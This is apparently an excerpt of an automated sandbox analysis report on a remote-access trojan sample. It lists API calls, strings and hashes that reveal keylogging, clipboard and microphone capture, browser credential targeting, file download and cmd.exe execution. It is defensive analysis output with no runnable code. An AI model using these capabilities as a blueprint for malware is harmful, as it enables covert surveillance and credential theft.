                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                              • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                              • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                                              • String ID: Connection Timeout
                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw
                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                              APIs
                                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                              • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                              • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: pth_unenc
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                              • String ID: bad locale name
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                              • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                              • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                              • String ID: !D@
                                                                                              • API String ID: 3446828153-604454484
                                                                                              • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                              • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                              • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                              • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExecuteShell
                                                                                              • String ID: /C $cmd.exe$open
                                                                                              • API String ID: 587946157-3896048727
                                                                                              • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                              • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                              • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                              • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                              APIs
                                                                                              • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                              • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                                              • String ID: pth_unenc
                                                                                              • API String ID: 3123878439-4028850238
                                                                                              • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                              • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                              • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                              • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetCursorInfo$User32.dll
                                                                                              • API String ID: 1646373207-2714051624
                                                                                              • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                              • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                              • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                              • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                                              • API String ID: 2574300362-1519888992
                                                                                              • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                              • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                              • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                              • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                              • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                              • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                              • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                              • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                              • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                              • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                              • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                              • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                              • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                                              • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3360349984-0
                                                                                              • Opcode ID: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                              • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                              • Opcode Fuzzy Hash: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                              • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                              APIs
                                                                                              Strings
                                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                              • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                              • API String ID: 3472027048-1236744412
                                                                                              • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                              • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                              • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                              • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                              APIs
                                                                                                • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                              • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                                              • String ID: [ $ ]
                                                                                              • API String ID: 3309952895-93608704
                                                                                              • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                              • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                              • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                              • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                              • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                              • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                              • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                              • String ID:
                                                                                              • API String ID: 3919263394-0
                                                                                              • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                              • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                              • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                              • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandleOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 39102293-0
                                                                                              APIs
                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                              • String ID:
                                                                                              • API String ID: 2633735394-0
                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                              • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                              • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                              • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 4116985748-0
                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 3213639722-2276729525
                                                                                              APIs
                                                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                              • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer__onexit
                                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                              • API String ID: 1881088180-3686566968
                                                                                              APIs
                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ACP$OCP
                                                                                              • API String ID: 0-711371036
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                              Strings
                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                              • API String ID: 481472006-1507639952
                                                                                              APIs
                                                                                              • Sleep.KERNEL32 ref: 0041667B
                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DownloadFileSleep
                                                                                              • String ID: !D@
                                                                                              • API String ID: 1931167962-604454484
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                              • API String ID: 481472006-2430845779
                                                                                              APIs
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: alarm.wav$hYG
                                                                                              • API String ID: 1174141254-2782910960
                                                                                              APIs
                                                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                              • String ID: Online Keylogger Stopped
                                                                                              • API String ID: 1623830855-1496645233
                                                                                              APIs
                                                                                              • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                                                              • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wave$BufferHeaderPrepare
                                                                                              • String ID: XMG
                                                                                              APIs
                                                                                              • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocaleValid
                                                                                              • String ID: IsValidLocaleName$kKD
                                                                                              APIs
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                              APIs
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                              APIs
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: AppData$\Opera Software\Opera Stable\
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID: >Y
                                                                                              APIs
                                                                                              • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
